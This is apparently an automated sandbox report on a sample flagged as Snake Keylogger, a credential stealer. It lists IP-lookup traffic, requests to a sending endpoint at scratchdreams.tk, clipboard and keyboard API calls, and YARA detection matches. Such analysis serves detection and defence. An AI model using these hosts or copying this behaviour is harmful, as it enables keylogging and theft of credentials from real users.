              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49738 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49754 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0019CE44
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com(
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002620000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
              Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49768 version: TLS 1.2
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0019EAFF
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0019ED6A
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0033ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0033ED6A
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0019EAFF
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0018AA57
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001B9576
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00359576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00359576

              System Summary

              barindex
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
